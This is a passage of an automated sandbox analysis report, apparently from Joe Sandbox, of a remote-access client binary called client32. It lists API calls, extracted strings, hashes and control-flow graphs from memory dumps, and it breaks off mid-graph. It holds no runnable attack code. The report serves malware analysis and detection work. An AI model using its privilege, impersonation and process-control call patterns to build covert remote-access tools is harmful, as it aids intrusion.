                                                                                        • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                                        • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                        • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                                        • CloseHandle.KERNEL32(?), ref: 1109D915
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                        • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                                        • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                        • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • GetSystemMetrics.USER32(00002000,00000054,?,00000020,00000056,?,00000020), ref: 1102ED54
                                                                                        • FindWindowA.USER32 ref: 1102EF15
                                                                                          • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
                                                                                          • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                          • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(``N,?,11031700,00000001,00000000), ref: 11110E98
                                                                                          • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(``N,?,11031700), ref: 11110EAC
                                                                                          • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                                        • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                                        • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                          • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                          • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                          • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000), ref: 11094F59
                                                                                        • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                                        • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                                        • FindWindowA.USER32 ref: 1102EFFD
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                                        • LoadIconA.USER32(11000000,000004C1,?,?,?,View,Client,Bridge), ref: 1102F521
                                                                                        • LoadIconA.USER32(11000000,000004C2,?,?,?,View,Client,Bridge), ref: 1102F531
                                                                                        • DestroyCursor.USER32(00000000,?,?,?,View,Client,Bridge), ref: 1102F557
                                                                                        • DestroyCursor.USER32(00000000,?,?,?,View,Client,Bridge), ref: 1102F568
                                                                                          • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                          • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                          • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                          • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                                        • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                                        • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                                        • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                                        • DispatchMessageA.USER32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 11030136
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110303D4
                                                                                        • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                                        • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                                        • SetWindowPos.USER32(0001033C,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 11030449
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110304CA
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • wsprintfA.USER32 ref: 11030645
                                                                                          • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,B24479DC,?,?,00000000), ref: 1112909A
                                                                                          • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                          • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                                        • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$506013$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                        • API String ID: 372548862-1813273994
                                                                                        • Opcode ID: d704798d304668d6c9d70897418e9064f11a88c0fb45a053e68e8965863a9617
                                                                                        • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                        • Opcode Fuzzy Hash: d704798d304668d6c9d70897418e9064f11a88c0fb45a053e68e8965863a9617
                                                                                        • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1049 1102e0d0-1102e120 call 111101b0 1052 1102e122-1102e136 call 11143630 1049->1052 1053 1102e138 1049->1053 1054 1102e13e-1102e183 call 11142e60 call 11143690 1052->1054 1053->1054 1061 1102e323-1102e332 call 11145990 1054->1061 1062 1102e189 1054->1062 1068 1102e338-1102e348 1061->1068 1064 1102e190-1102e193 1062->1064 1066 1102e195-1102e197 1064->1066 1067 1102e1b8-1102e1c1 1064->1067 1069 1102e1a0-1102e1b1 1066->1069 1070 1102e1c7-1102e1ce 1067->1070 1071 1102e2f4-1102e30d call 11143690 1067->1071 1072 1102e34a 1068->1072 1073 1102e34f-1102e363 call 1102d360 1068->1073 1069->1069 1074 1102e1b3 1069->1074 1070->1071 1076 1102e2c3-1102e2d8 call 11163ca7 1070->1076 1077 1102e1d5-1102e1d7 1070->1077 1078 1102e2da-1102e2ef call 11163ca7 1070->1078 1079 1102e26a-1102e29d call 11162777 call 11142e60 1070->1079 1080 1102e2ab-1102e2c1 _strncpy 1070->1080 1081 1102e25b-1102e265 1070->1081 1082 1102e29f-1102e2a9 1070->1082 1083 1102e21c-1102e222 1070->1083 1084 1102e24c-1102e256 1070->1084 1071->1064 1098 1102e313-1102e315 1071->1098 1072->1073 1093 1102e368-1102e36d 1073->1093 1074->1071 1076->1071 1077->1071 1092 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 1077->1092 1078->1071 1079->1071 1080->1071 1081->1071 1082->1071 1086 1102e224-1102e238 call 11163ca7 1083->1086 1087 1102e23d-1102e247 1083->1087 1084->1071 1086->1071 1087->1071 1092->1071 1100 1102e413-1102e42d call 11146fe0 1093->1100 1101 1102e373-1102e398 call 110b7df0 call 11147060 1093->1101 1098->1100 1104 1102e31b-1102e321 1098->1104 1113 1102e483-1102e48f call 1102bc40 1100->1113 1114 1102e42f-1102e448 call 1105e820 1100->1114 1124 1102e3a3-1102e3a9 1101->1124 1125 1102e39a-1102e3a1 1101->1125 1104->1061 1104->1068 1126 1102e491-1102e498 1113->1126 1127 1102e468-1102e46f 1113->1127 1114->1113 1130 1102e44a-1102e45c 1114->1130 1128 1102e3ab-1102e3b2 call 11028360 1124->1128 1129 1102e409 1124->1129 1125->1100 1131 1102e475-1102e478 1126->1131 1132 1102e49a-1102e4a4 1126->1132 1127->1131 1133 1102e67a-1102e69b GetComputerNameA 1127->1133 1128->1129 1146 1102e3b4-1102e3e6 1128->1146 1129->1100 1130->1113 1143 1102e45e 1130->1143 1137 1102e47a-1102e481 call 110b7df0 1131->1137 1138 1102e4a9 1131->1138 1132->1133 1139 1102e6d3-1102e6d9 1133->1139 1140 1102e69d-1102e6d1 call 11028230 1133->1140 1145 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 1137->1145 1138->1145 1141 1102e6db-1102e6e0 1139->1141 1142 1102e70f-1102e722 _strncpy 1139->1142 1140->1139 1166 1102e727-1102e733 1140->1166 1147 1102e6e6-1102e6ea 1141->1147 1148 1102e917-1102e93a 1142->1148 1143->1127 1198 1102e64a-1102e652 SetLastError 1145->1198 1199 1102e58c-1102e5a3 1145->1199 1161 1102e3f0-1102e3ff call 110f64d0 1146->1161 1162 1102e3e8-1102e3ee 1146->1162 1154 1102e706-1102e708 1147->1154 1155 1102e6ec-1102e6ee 1147->1155 1170 1102e962-1102e96a 1148->1170 1171 1102e93c-1102e942 1148->1171 1163 1102e70b-1102e70d 1154->1163 1158 1102e702-1102e704 1155->1158 1159 1102e6f0-1102e6f6 1155->1159 1158->1163 1159->1154 1169 1102e6f8-1102e700 1159->1169 1167 1102e402-1102e404 call 1102d900 1161->1167 1162->1161 1162->1167 1163->1142 1163->1166 1178 1102e735-1102e74a call 110b7df0 call 1102a1f0 1166->1178 1179 1102e74c-1102e75f call 11081d30 1166->1179 1167->1129 1169->1147 1169->1158 1175 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 1170->1175 1176 1102e96c-1102e979 call 11036710 call 11162777 1170->1176 1171->1170 1173 1102e944-1102e95d call 1102d900 1171->1173 1173->1170 1176->1175 1204 1102e7a3-1102e7bc call 11081d30 1178->1204 1192 1102e761-1102e784 1179->1192 1193 1102e786-1102e788 1179->1193 1192->1204 1200 1102e790-1102e7a1 1193->1200 1206 1102e613-1102e61f 1198->1206 1199->1206 1216 1102e5a5-1102e5ae 1199->1216 1200->1200 1200->1204 1221 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 1204->1221 1222 1102e8fc-1102e909 _strncpy 1204->1222 1210 1102e662-1102e671 1206->1210 1211 1102e621-1102e62d 1206->1211 1210->1133 1218 1102e673-1102e674 FreeLibrary 1210->1218 1214 1102e63f-1102e643 1211->1214 1215 1102e62f-1102e63d GetProcAddress 1211->1215 1223 1102e654-1102e656 SetLastError 1214->1223 1224 1102e645-1102e648 1214->1224 1215->1214 1216->1206 1220 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 1216->1220 1218->1133 1220->1206 1242 1102e5e8-1102e60e call 11147060 call 11027f80 1220->1242 1255 1102e853-1102e869 call 11129e00 1221->1255 1256 1102e83f-1102e84e call 11029a70 1221->1256 1229 1102e90c-1102e911 CharUpperA 1222->1229 1226 1102e65c 1223->1226 1224->1226 1226->1210 1229->1148 1242->1206 1260 1102e882-1102e8bc call 110d0e20 * 2 1255->1260 1261 1102e86b-1102e87d call 110d0e20 1255->1261 1256->1255 1268 1102e8d2-1102e8fa _strncpy call 110d0a10 1260->1268 1269 1102e8be-1102e8cd call 11029a70 1260->1269 1261->1260 1268->1229 1269->1268
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc_memsetwsprintf
                                                                                        • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$506013$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                        • API String ID: 3802068140-3850021854
                                                                                        • Opcode ID: 563c3c4442be5b629e94707c3790478f407da48259bf7247bb068fa10df72bc9
                                                                                        • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                        • Opcode Fuzzy Hash: 563c3c4442be5b629e94707c3790478f407da48259bf7247bb068fa10df72bc9
                                                                                        • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1903 11144140-11144181 GetModuleFileNameA 1904 111441c3 1903->1904 1905 11144183-11144196 call 11081e00 1903->1905 1907 111441c9-111441cd 1904->1907 1905->1904 1911 11144198-111441c1 LoadLibraryA 1905->1911 1909 111441cf-111441dc LoadLibraryA 1907->1909 1910 111441e9-11144207 GetModuleHandleA GetProcAddress 1907->1910 1909->1910 1912 111441de-111441e6 LoadLibraryA 1909->1912 1913 11144217-11144240 GetProcAddress * 4 1910->1913 1914 11144209-11144215 1910->1914 1911->1907 1912->1910 1915 11144243-111442c3 GetProcAddress * 10 call 11162bb7 1913->1915 1914->1915
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,756F110C), ref: 11144173
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                        • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                        • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                          • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                        • API String ID: 3874234733-2061581830
                                                                                        • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                        • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                        • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                        • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2190 1102e199 2191 1102e1a0-1102e1b1 2190->2191 2191->2191 2192 1102e1b3 2191->2192 2193 1102e2f4-1102e30d call 11143690 2192->2193 2196 1102e313-1102e315 2193->2196 2197 1102e190-1102e193 2193->2197 2200 1102e413-1102e42d call 11146fe0 2196->2200 2201 1102e31b-1102e321 2196->2201 2198 1102e195-1102e197 2197->2198 2199 1102e1b8-1102e1c1 2197->2199 2198->2191 2199->2193 2202 1102e1c7-1102e1ce 2199->2202 2224 1102e483-1102e48f call 1102bc40 2200->2224 2225 1102e42f-1102e448 call 1105e820 2200->2225 2204 1102e323-1102e332 call 11145990 2201->2204 2205 1102e338-1102e348 2201->2205 2202->2193 2209 1102e2c3-1102e2d8 call 11163ca7 2202->2209 2210 1102e1d5-1102e1d7 2202->2210 2211 1102e2da-1102e2ef call 11163ca7 2202->2211 2212 1102e26a-1102e29d call 11162777 call 11142e60 2202->2212 2213 1102e2ab-1102e2c1 _strncpy 2202->2213 2214 1102e25b-1102e265 2202->2214 2215 1102e29f-1102e2a9 2202->2215 2216 1102e21c-1102e222 2202->2216 2217 1102e24c-1102e256 2202->2217 2204->2205 2207 1102e34a 2205->2207 2208 1102e34f-1102e36d call 1102d360 2205->2208 2207->2208 2208->2200 2238 1102e373-1102e398 call 110b7df0 call 11147060 2208->2238 2209->2193 2210->2193 2228 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2210->2228 2211->2193 2212->2193 2213->2193 2214->2193 2215->2193 2221 1102e224-1102e238 call 11163ca7 2216->2221 2222 1102e23d-1102e247 2216->2222 2217->2193 2221->2193 2222->2193 2245 1102e491-1102e498 2224->2245 2246 1102e468-1102e46f 2224->2246 2225->2224 2244 1102e44a-1102e45c 2225->2244 2228->2193 2272 1102e3a3-1102e3a9 2238->2272 2273 1102e39a-1102e3a1 2238->2273 2244->2224 2267 1102e45e 2244->2267 2250 1102e475-1102e478 2245->2250 2251 1102e49a-1102e4a4 2245->2251 2246->2250 2253 1102e67a-1102e69b GetComputerNameA 2246->2253 2257 1102e47a-1102e481 call 110b7df0 2250->2257 2258 1102e4a9 2250->2258 2251->2253 2260 1102e6d3-1102e6d9 2253->2260 2261 1102e69d-1102e6d1 call 11028230 2253->2261 2265 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2257->2265 2258->2265 2263 1102e6db-1102e6e0 2260->2263 2264 1102e70f-1102e722 _strncpy 2260->2264 2261->2260 2290 1102e727-1102e733 2261->2290 2269 1102e6e6-1102e6ea 2263->2269 2270 1102e917-1102e93a 2264->2270 2325 1102e64a-1102e652 SetLastError 2265->2325 2326 1102e58c-1102e5a3 2265->2326 2267->2246 2277 1102e706-1102e708 2269->2277 2278 1102e6ec-1102e6ee 2269->2278 2293 